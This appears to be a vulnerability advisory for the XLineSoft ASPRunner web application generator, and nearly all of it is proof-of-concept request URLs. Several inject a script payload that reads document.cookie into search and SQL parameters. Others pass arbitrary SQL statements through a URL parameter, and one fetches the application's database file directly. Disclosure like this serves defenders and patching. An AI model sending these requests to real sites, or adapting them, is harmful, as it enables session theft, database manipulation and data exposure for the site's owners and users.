XLineSoft ASPRunner Multiple Vulnerabilities
No exploit is required. The following proof of concept examples are available:

http://www.example.com/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&SearchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldName=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=

http://www.example.com/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPageNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&NeedQuotes=&NeedQuotes=&action=view

http://www.example.com/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPage=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQuoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=True&Typeen=202&NeedQuotesdesc=True&Typedesc=203

http://www.example.com/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&pagesize=20

http://www.example.com/db/[DB-FILE-NAME]